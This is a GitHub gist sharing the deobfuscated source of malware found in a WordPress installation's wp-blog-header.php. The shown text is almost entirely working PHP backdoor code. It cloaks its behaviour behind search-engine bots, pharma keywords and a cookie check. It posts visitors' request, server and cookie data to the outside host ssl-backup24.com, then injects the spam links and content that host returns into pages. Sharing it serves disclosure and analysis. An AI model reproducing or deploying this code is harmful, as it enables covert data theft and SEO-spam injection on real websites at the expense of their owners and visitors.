Skip to content

Instantly share code, notes, and snippets.

@jonaslejon

jonaslejon/wp-blog-header.php

Last active July 7, 2018 14:38
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jonaslejon/a591aae2aef928c744fa1fe0d538627e to your computer and use it in GitHub Desktop.
Save jonaslejon/a591aae2aef928c744fa1fe0d538627e to your computer and use it in GitHub Desktop.
Download ZIP
Malware found on WordPress installation. This is the deobfuscated version
Raw
wp-blog-header.php
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
function fetch_urlDosNZ($url, $data) {
$content = '';
if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$opts = array('http' => array('method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data)));
$context = stream_context_create($opts);
$content = file_get_contents($url, false, $context);
} elseif (function_exists('curl_init')) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
$content = $out;
}
return ($content);
}
function ob_include_handlerDosNZ($buffer, $extra_info) {
$deflated = false;
$content = $buffer;
if (function_exists('gzinflate')) {
$inf = @gzinflate(substr($buffer, 10, -8));
if ($inf !== false) {
$content = $inf;
$deflated = true;
}
}
$links = array();
$comment = '';
if (array_key_exists('links', $extra_info)) $links = $extra_info['links'];
if (array_key_exists('comment', $extra_info)) $comment = $extra_info['comment'];
if (!function_exists('anchorDosNZ')) {
function anchorDosNZ($data) {
if (!preg_match("/<img/i", $data[2])) return "<!-- link_" . $GLOBALS['__i']++ . " -->" . $data[0];
}
}
srand(crc32(serialize($extra_info)));
$GLOBALS['__i'] = 0;
$content = preg_replace_callback("/<a(.*?)>(.*?)<\/a>/is", "anchorDosNZ", $content);
$i = $GLOBALS['__i'];
if ($i >= count($links)) {
for ($k = 0;$k < count($links);$k++) $content = preg_replace("/<!-- link_$k -->/s", $links[$k] . ' ', $content);
} elseif ($i > 0) {
$n_links = round(count($links) / $i);
for ($k = 0;$k < $i;$k++) {
$out_content = '';
for ($p = 0;$p < $n_links;$p++) if (($k * $n_links + $p) < count($links)) $out_content.= $links[$k * $n_links + $p];
$content = preg_replace("/<!-- link_$k -->/s", $out_content . ' ', $content);
}
}
$content = preg_replace("/<!-- link_(\d+) -->/s", '', $content);
if ($comment) {
if (preg_match("/<head/i", $content)) {
$content = preg_replace('/(<head.*?>)/is', "$1$comment", $content, 1);
} elseif (preg_match("/<html/i", $content)) {
$content = preg_replace('/(<html.*?>)/is', "$1$comment", $content, 1);
} else $content = preg_replace('/^/', "$comment", $content);
}
if ($deflated) $content = gzencode($content);
$clen = strlen($content);
@header("Content-Length: $clen");
return $content;
}
if (!array_key_exists('HTTP_USER_AGENT', $_SERVER)) $_SERVER['HTTP_USER_AGENT'] = '';
if (!defined('FCONTENT_PROC') && (preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"]) or preg_match('/viagra|cialis|levitra|tadalafil|sildenafil|vardenafil/i', $_SERVER["REQUEST_URI"]) or in_array('0b87dff37d50b975663e8a34add043b4', array_map('md5', $_COOKIE)))) {
define('FCONTENT_PROC', 1);
$outsourceurl = "http://" . cdomainDosNZ . "/" . showop_phpDosNZ;
$outsourcedata = array('request' => base64_encode(serialize($_REQUEST)), 'server' => base64_encode(serialize($_SERVER)), 'cookie' => base64_encode(serialize($_COOKIE)), 'version' => '2016_click');
$out = fetch_urlDosNZ($outsourceurl, $outsourcedata);
$out = preg_replace('/<script.*?<\/script>/s', '', $out);
if (substr($out, 0, 32) == '8d777f385d3dfec8815d20f7496026dc') {
$extra_info = unserialize(base64_decode(substr($out, 32)));
if (array_key_exists('links', $extra_info)) {
header('Cache-Control: no-cache, no-store, must-revalidate');
ob_start(function ($buffer) use ($extra_info) {
return ob_include_handlerDosNZ($buffer, $extra_info);
});
}
if (array_key_exists('headers', $extra_info)) foreach ($extra_info['headers'] as $h => $code) header($h, true, $code);
if (array_key_exists('content', $extra_info)) echo ($extra_info['content']);
if (array_key_exists('sendinfo', $extra_info)) {
$data = base64_encode(serialize(array('file' => __FILE__, 'line' => __LINE__, 'server' => $_SERVER)));
$outsourceurl = "http://" . cdomainDosNZ . "/" . info_phpDosNZ . "?data=$data";
fetch_urlDosNZ($outsourceurl, array('data' => $data));
}
if (array_key_exists('stop', $extra_info)) exit;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment